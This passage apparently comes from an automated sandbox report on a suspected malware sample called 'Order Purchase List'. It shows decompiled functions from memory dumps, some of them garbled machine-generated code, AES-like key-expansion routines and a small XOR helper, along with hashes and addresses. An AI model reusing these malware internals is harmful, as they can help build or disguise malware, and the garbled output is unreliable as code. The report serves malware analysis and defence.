				void* _t143;
				void* _t144;
				void* _t147;
				signed int _t151;
				void* _t152;
				void* _t155;
				void* _t162;
				void* _t164;
				intOrPtr* _t169;
				signed int _t170;
				void* _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				void* _t181;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				void* _t190;
				signed int _t194;

				_t185 = __esi;
				_t85 = __eax + 3;
				 *((intOrPtr*)(__edx + 0x22)) =  *((intOrPtr*)(__edx + 0x22)) + __ebx;
				 *__ebx =  *__ebx + _t85;
				asm("sbb [ecx+0x17], dl");
				_push(es);
				 *__ebx =  *__ebx + _t85;
				 *__edx =  *__edx + _t85;
				asm("adc ecx, [eax]");
				asm("sbb al, 0x16");
				asm("scasd");
				_t88 = _t85 + 0x00000003 + __ecx &  *(_t85 + 3 + __ecx);
				 *_t88 =  *_t88 + _t88;
				 *__ebx =  *__ebx + __edx;
				 *(_t88 + 0x304b50b) =  *(_t88 + 0x304b50b) | __ecx;
				 *__ebx =  *__ebx + _t88;
				_t89 = _t88 &  *_t88;
				 *_t89 =  *_t89 + _t89;
				 *__ebx =  *__ebx + __edx;
				 *(__ebx + __ecx + 0x304bb) =  *(__ebx + __ecx + 0x304bb) | __edx;
				_t90 = _t89 | 0x00000023;
				 *_t90 =  *_t90 + _t90;
				 *_t90 =  *_t90 + _t90;
				asm("adc ecx, [eax]");
				asm("enter 0x404, 0x0");
				_t92 = _t90 ^  *__edi ^  *__ebx;
				 *_t92 =  *_t92 + _t92;
				 *_t92 =  *_t92 + _t92;
				asm("adc [eax], ebx");
				_push(__edi);
				_pop(ss);
				_t94 = _t92 - 0x57000403 &  *(_t92 - 0x57000403);
				 *_t94 =  *_t94 + _t94;
				 *__esi =  *__esi + _t94;
				asm("sbb [ecx+0x17], dl");
				_push(es);
				 *((intOrPtr*)(_t94 + _t94)) =  *((intOrPtr*)(_t94 + _t94)) + _t94;
				asm("pushad");
				_t95 = _t94 &  *_t94;
				 *_t95 =  *_t95 + _t95;
				 *__ecx =  *__ecx + __edx;
				 *((intOrPtr*)(__ecx + 0x404cc19)) =  *((intOrPtr*)(__ecx + 0x404cc19)) + _t95;
				 *__ebx =  *__ebx + __ecx;
				_push(ss);
				 *(__ecx + 0x1b) =  *(__ecx + 0x1b) | __edx;
				asm("aam 0x4");
				_push(es);
				 *_t95 =  *_t95 + __ebx;
				_t96 = _t95 & 0x00000000;
				 *_t96 =  *_t96 + _t96;
				 *__esi =  *__esi + _t96;
				_t139 = __ebx | __edx;
				asm("adc [edi+0x3], al");
				_push(es);
				 *__edx =  *__edx + _t139;
				_t97 = _t96 & 0x00000000;
				 *_t97 =  *_t97 + _t97;
				 *__esi =  *__esi + _t97;
				 *_t139 =  *_t139 | _t97;
				asm("adc [eax], edx");
				 *__esi =  *__esi + _t97;
				 *_t194 =  *_t194 + __ecx;
				 *_t97 =  *_t97 + _t97;
				 *_t139 =  *_t139 + __edx;
				 *(__ecx + _t139 + 0x704d4) =  *(__ecx + _t139 + 0x704d4) | __edx;
				asm("arpl [eax+eax], sp");
				 *_t97 =  *_t97 + _t97;
				 *__esi =  *__esi + _t97;
				asm("sbb [ecx+0x17], dl");
				_push(es);
				 *__edi =  *__edi + _t97;
				 *_t194 =  *_t194 + __edx;
				asm("les eax, [edx]");
				asm("out dx, eax");
				_t178 = __edx |  *0xe4000700;
				_t98 = _t97 & 0x00000000;
				 *_t98 =  *_t98 + _t98;
				 *__ecx =  *__ecx + _t98;
				_t169 = __ecx + __ecx;
				asm("sbb eax, [esi]");
				 *_t98 =  *_t98 + _t169;
				 *_t169 =  *_t169 + _t169;
				_t99 = _t98 ^  *_t98;
				 *_t99 =  *_t99 + _t99;
				 *((intOrPtr*)(_t139 + 0xb)) =  *((intOrPtr*)(_t139 + 0xb)) + _t99;
				 *_t139 =  *_t139 + _t178;
				_t101 = 0x00000001 ^  *1;
				 *_t101 =  *_t101 + 1;
				 *((intOrPtr*)(_t139 + 0xb)) =  *((intOrPtr*)(_t139 + 0xb)) + _t101;
				asm("les eax, [ecx]");
				asm("fild word [eax+ecx]");
				 *((intOrPtr*)(_t178 + __esi)) =  *((intOrPtr*)(_t178 + __esi)) + _t139;
				 *_t101 =  *_t101 + _t101;
				 *_t101 =  *_t101 + _t101;
				_t179 = _t178;
				_t141 = 1 + _t139 + _t169;
				 *__esi =  *__esi + 1;
				_t103 = _t101 + 0x00000009 ^  *(_t101 + 9);
				 *_t103 = 1 +  *_t103;
				 *((intOrPtr*)(_t141 + 0xb)) =  *((intOrPtr*)(_t141 + 0xb)) + _t103;
				asm("loop 0x5");
				asm("fild word [ecx+ecx]");
				 *__edi =  *__edi + _t169;
				_t104 = _t103 ^  *_t103;
				 *_t104 =  *_t104 + _t104;
				_t28 = _t141 + 0xb;
				 *_t28 =  *((intOrPtr*)(_t141 + 0xb)) + _t104;
				if( *_t28 >= 0) {
					 *_t169 =  *_t169 + _t141;
				}
				 *_t104 =  *_t104 + _t104;
				 *_t104 =  *_t104 & _t104;
				_t105 = _t104 |  *(_t104 + 0xa04df04);
				 *((intOrPtr*)(_t179 + 0x32)) =  *((intOrPtr*)(_t179 + 0x32)) + _t105;
				 *_t105 =  *_t105 + _t105;
				 *_t105 =  *_t105 + _t105;
				_t143 = _t141 + 2;
				_t186 = _t185 |  *(_t185 + 0xb04e600);
				 *((intOrPtr*)(_t179 + _t186)) =  *((intOrPtr*)(_t179 + _t186)) + _t169;
				 *_t105 =  *_t105 + _t105;
				 *((intOrPtr*)(_t143 + 0xb)) =  *((intOrPtr*)(_t143 + 0xb)) + _t105;
				asm("rol dword [eax], 0xec");
				_t106 = _t105 + 0xb;
				 *((intOrPtr*)(_t190 + 0x32)) =  *((intOrPtr*)(_t190 + 0x32)) + _t179;
				 *_t106 =  *_t106 + _t106;
				 *_t106 =  *_t106 + _t106;
				_t144 = _t143 + 1;
				asm("out 0x4, al");
				_pop(_t183);
				_t108 = _t106 ^  *_t106;
				 *_t108 =  *_t108 + _t108;
				 *((intOrPtr*)(_t144 + 0xb)) =  *((intOrPtr*)(_t144 + 0xb)) + _t108;
				asm("outsb");
				_t170 = _t169 + _t108;
				_t109 = _t108 + 0xc;
				 *((intOrPtr*)(_t109 + 0x32)) =  *((intOrPtr*)(_t109 + 0x32)) + _t170;
				 *_t109 =  *_t109 + _t109;
				 *_t109 =  *_t109 + _t109;
				_t110 = _t109 + 0xd;
				 *((intOrPtr*)(_t179 + 0x32)) =  *((intOrPtr*)(_t179 + 0x32)) + _t179;
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 & _t110;
				_t147 = _t144 + 1 + _t179 + 1;
				_t180 = _t179 | _t183;
				_t172 = (_t170 | _t194 |  *(_t144 + 2)) + _t147;
				_t111 = _t110 + 0xd;
				 *((intOrPtr*)(_t147 + 0x32)) =  *((intOrPtr*)(_t147 + 0x32)) + _t147;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				_t112 = _t111 + 0x3285000e;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 & _t112;
				_t187 = _t186 | _t180;
				 *_t187 =  *_t187 + _t112;
				_t113 = _t112 + 0x328e000e;
				 *_t113 =  *_t113 + _t113;
				 *_t113 =  *_t113 + _t113;
				_t151 = _t147 + 3 |  *(_t113 + _t113 + 0xf050d);
				_t115 = _t113 ^  *_t113;
				 *_t115 =  *_t115 + _t115;
				 *((intOrPtr*)(_t151 + 0xb)) =  *((intOrPtr*)(_t151 + 0xb)) + _t115;
				 *((intOrPtr*)(_t172 + 0x32)) =  *((intOrPtr*)(_t172 + 0x32)) + _t115;
				 *((intOrPtr*)(_t151 + 0xb)) =  *((intOrPtr*)(_t151 + 0xb)) + _t115;
				_t116 = _t115 ^  *_t115;
				 *_t116 =  *_t116 + _t116;
				 *((intOrPtr*)(_t151 + 0xb)) =  *((intOrPtr*)(_t151 + 0xb)) + _t116;
				_push(_t187);
				_t181 = _t180 +  *_t151;
				_t117 = _t116 + 0x32b40010;
				 *_t117 =  *_t117 + _t117;
				 *_t117 =  *_t117 + _t117;
				_t152 = 1 + _t151;
				_t175 = _t172 - 0x00000001 +  *0xab001005 |  *(_t152 + _t117 + 0xd);
				_t118 = _t117 + 0x32be0011;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 & _t118;
				asm("adc eax, [0x32c70011]");
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				_t155 = 1 + (_t152 + 0x00000001 |  *(_t175 + 3));
				_t121 = (_t118 |  *(_t118 + 4) | 0xd1001205) ^  *(_t118 |  *(_t118 + 4) | 0xd1001205);
				 *_t121 =  *_t121 + _t121;
				 *((intOrPtr*)(_t155 + 0xb)) =  *((intOrPtr*)(_t155 + 0xb)) + _t121;
				_t123 = _t121 + 0x32da0025;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				_t125 = _t123 + 0x32e40020;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 & _t125;
				_t127 = _t125 + 0x32ed0026;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				_t128 = _t127 |  *(_t181 + 1);
				asm("sbb al, [0x32f80014]");
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 & _t128;
				_t176 = _t175 |  *(1 + (_t187 | _t125));
				 *0x333b0014 =  *0x333b0014 & _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				asm("daa");
				_t129 = _t128 + 0x33450015;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 & _t129;
				_t162 = 1 + (_t155 + 5 |  *(_t181 + 1));
				_t131 = _t129 - 0x4e001505 ^  *(_t129 - 0x4e001505);
				 *_t131 =  *_t131 + _t131;
				 *((intOrPtr*)(_t162 + 0xb)) =  *((intOrPtr*)(_t162 + 0xb)) + _t131;
				asm("lodsd");
				_t133 = _t131 +  *_t183 + 0x33580016;
				 *_t133 =  *_t133 + _t133;
				 *_t133 =  *_t133 & _t133;
				 *((intOrPtr*)(_t176 + 0x33)) =  *((intOrPtr*)(_t176 + 0x33)) + _t133;
				 *_t133 =  *_t133 + _t133;
				 *_t133 =  *_t133 + _t133;
				_t164 = _t162 + 2;
				 *((intOrPtr*)(_t164 + 0x33)) =  *((intOrPtr*)(_t164 + 0x33)) + _t176;
				 *_t133 =  *_t133 + _t133;
				 *_t133 =  *_t133 & _t133;
				_t165 = _t164 + 1;
				_t135 = (_t133 | _t176) ^  *(_t133 | _t176);
				 *_t135 =  *_t135 + _t135;
				 *((intOrPtr*)(_t165 + 0xb)) =  *((intOrPtr*)(_t164 + 0xc)) + _t135;
				_t137 = _t135 + 0x33800018;
				 *_t137 =  *_t137 + _t137;
				 *_t137 =  *_t137 & _t137;
				return _t137;
			}

0x009f732f
0x009f732f
0x009f7331
0x009f7337
0x009f7339
0x009f733c
0x009f733d
0x009f733f
0x009f7346
0x009f7348
0x009f734a
0x009f734f
0x009f7351
0x009f7353
0x009f7355
0x009f735b
0x009f735d
0x009f735f
0x009f7361
0x009f7363
0x009f736a
0x009f736c
0x009f736e
0x009f7370
0x009f7374
0x009f7378
0x009f737a
0x009f737c
0x009f737e
0x009f7380
0x009f7381
0x009f7387
0x009f7389
0x009f738b
0x009f738d
0x009f7390
0x009f7391
0x009f7394
0x009f7395
0x009f7397
0x009f7399
0x009f739b
0x009f73a1
0x009f73a8
0x009f73a9
0x009f73ac
0x009f73ae
0x009f73af
0x009f73b1
0x009f73b3
0x009f73b5
0x009f73b7
0x009f73b9
0x009f73bc
0x009f73bd
0x009f73bf
0x009f73c1
0x009f73c3
0x009f73c5
0x009f73c7
0x009f73c9
0x009f73cb
0x009f73cf
0x009f73d1
0x009f73d3
0x009f73da
0x009f73dd
0x009f73df
0x009f73e1
0x009f73e4
0x009f73e5
0x009f73e7
0x009f73ee
0x009f73f0
0x009f73f1
0x009f73f7
0x009f73f9
0x009f73fb
0x009f73fd
0x009f73ff
0x009f7401
0x009f7403
0x009f7405
0x009f7407
0x009f7409
0x009f7411
0x009f7413
0x009f7415
0x009f7417
0x009f741a
0x009f741c
0x009f741f
0x009f7422
0x009f7424
0x009f7427
0x009f7429
0x009f742d
0x009f742f
0x009f7431
0x009f7433
0x009f7436
0x009f7438
0x009f743b
0x009f743d
0x009f743f
0x009f7441
0x009f7441
0x009f7444
0x009f7449
0x009f7449
0x009f744c
0x009f744e
0x009f7451
0x009f7457
0x009f745a
0x009f745c
0x009f745e
0x009f745f
0x009f7465
0x009f7469
0x009f746b
0x009f746e
0x009f7471
0x009f7473
0x009f7476
0x009f7478
0x009f747a
0x009f747e
0x009f7482
0x009f7483
0x009f7485
0x009f7487
0x009f748a
0x009f748b
0x009f748d
0x009f748f
0x009f7492
0x009f7494
0x009f749b
0x009f749d
0x009f74a0
0x009f74a2
0x009f74a4
0x009f74a5
0x009f74a7
0x009f74a9
0x009f74ab
0x009f74ae
0x009f74b0
0x009f74b5
0x009f74b7
0x009f74bc
0x009f74be
0x009f74c1
0x009f74c3
0x009f74c5
0x009f74ca
0x009f74cc
0x009f74cf
0x009f74d7
0x009f74d9
0x009f74db
0x009f74e3
0x009f74e9
0x009f74f3
0x009f74f5
0x009f74f7
0x009f74fa
0x009f74fb
0x009f74fd
0x009f7502
0x009f7504
0x009f7506
0x009f7507
0x009f750b
0x009f7510
0x009f7512
0x009f7518
0x009f751e
0x009f7520
0x009f7522
0x009f752b
0x009f752d
0x009f752f
0x009f7535
0x009f753a
0x009f753c
0x009f7543
0x009f7548
0x009f754a
0x009f7551
0x009f7556
0x009f7558
0x009f755b
0x009f755e
0x009f7564
0x009f7566
0x009f7569
0x009f756c
0x009f7572
0x009f7574
0x009f757a
0x009f757b
0x009f7580
0x009f7582
0x009f7584
0x009f758d
0x009f758f
0x009f7591
0x009f7594
0x009f7597
0x009f759c
0x009f759e
0x009f75a7
0x009f75aa
0x009f75ac
0x009f75ae
0x009f75b5
0x009f75b8
0x009f75ba
0x009f75bc
0x009f75c5
0x009f75c7
0x009f75c9
0x009f75cf
0x009f75d4
0x009f75d6
0x009f75e0

Memory Dump Source

Source File: 0000000A.00000002.396059881.00000000009F2000.00000002.00020000.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.396048157.00000000009F0000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.396181453.0000000000B00000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Order Purchase List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff99962d93dbb76bf86a8927adda7a5537db0c7c941e3cfd538f1c5c05d29ae1
Instruction ID: 490b48f5a00ce7d02c26bd60175cb43ab5cc778e07a971ef604cd87e88dd24ce
Opcode Fuzzy Hash: ff99962d93dbb76bf86a8927adda7a5537db0c7c941e3cfd538f1c5c05d29ae1
Instruction Fuzzy Hash: DDC1E1A680E3C05FD7578B748DB55917FB0AE2720070E86EBC4C5CF4A3E118A91AD763

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9f
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 00402D87, Relevance: .2, Instructions: 160
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E00402D87(signed int* __edi, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int* _t85;
				signed int _t98;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int* _t114;
				signed int _t131;
				signed int _t133;
				signed int _t137;
				signed int _t158;
				signed int* _t180;

				_push(ds);
				asm("salc");
				_t70 =  *__edi * 0x8bec8b55;
				_t85 = _a8;
				_t114 = _a4;
				_push(_t70);
				_push(__edi);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t114 =  *_t85 & 0xff00ff00 |  *_t85 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[1] = _t85[1] & 0xff00ff00 | _t85[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[2] = _t85[2] & 0xff00ff00 | _t85[2] & 0x00ff00ff;
				_t67 =  &(_t114[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[3] = _t85[3] & 0xff00ff00 | _t85[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[4] = _t85[4] & 0xff00ff00 | _t85[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[5] = _t85[5] & 0xff00ff00 | _t85[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[6] = _t85[6] & 0xff00ff00 | _t85[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t114[7] = _t85[7] & 0xff00ff00 | _t85[7] & 0x00ff00ff;
				if(_a12 != 0x100) {
					L5:
					return _t67 | 0xffffffff;
				} else {
					_t180 = _a4;
					_t72 = 0;
					_a12 = 0;
					while(1) {
						_t158 =  *(_t67 + 0x18);
						_t98 = ( *(_t180 + 4 + (_t158 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t180 + _t72 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t180 + 4 + (_t158 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 5 + (_t158 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t180 + 4 + (_t158 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
						_t131 =  *_t67 ^ _t98;
						 *(_t67 + 0x1c) = _t98;
						_t100 =  *(_t67 + 4) ^ _t131;
						 *(_t67 + 0x20) = _t131;
						_t133 =  *(_t67 + 8) ^ _t100;
						 *(_t67 + 0x24) = _t100;
						 *(_t67 + 0x28) = _t133;
						if(_t72 == 6) {
							break;
						}
						_t110 = ( *(_t180 + 4 + (_t133 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t180 + 4 + (_t133 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 4 + (_t133 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t180 + 5 + (_t133 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
						_t137 =  *(_t67 + 0x10) ^ _t110;
						 *(_t67 + 0x2c) = _t110;
						_t112 =  *(_t67 + 0x14) ^ _t137;
						 *(_t67 + 0x34) = _t112;
						_t72 = _a12 + 1;
						 *(_t67 + 0x30) = _t137;
						 *(_t67 + 0x38) = _t112 ^ _t158;
						_t67 = _t67 + 0x20;
						_a12 = _t72;
						if(_t72 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x00402d87
0x00402d8d
0x00402d8e
0x00402d93
0x00402d98
0x00402d9b
0x00402d9d
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9d
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a50954314b6cbbb752146166c75368b6fa30f512ff175ded48fbf907d0de8446
Instruction ID: 1a13d89bf5bb1846c0edc9fa13631d371e3cec2800407f547806a5c5019889a2
Opcode Fuzzy Hash: a50954314b6cbbb752146166c75368b6fa30f512ff175ded48fbf907d0de8446
Instruction Fuzzy Hash: 8551B4B3E54A214BD318CF09CD40631B692FFC8312B5F81BEDD199B397CE74A9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00401030
0x0040105b
0x0040105d
0x00401063
0x00401065
0x00401065
0x00401071
0x00401076
0x0040107c
0x004010ac
0x004010ae
0x004010b4
0x004010ba
0x004010bc
0x004010bc
0x004010cb
0x004010d0
0x004010d6
0x00401101
0x00401103
0x00401109
0x0040110f
0x00401111
0x00401111
0x00401120
0x00401128
0x0040112b
0x0040114f
0x00401156
0x0040115d
0x00401169
0x0040116c
0x0040116f
0x00401173

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 004162ED, Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004162ED(signed int __eax, void* __ecx, void* __edi) {

				return (__eax ^ 0x000000f1) + 0xc6;
			}

0x00416303

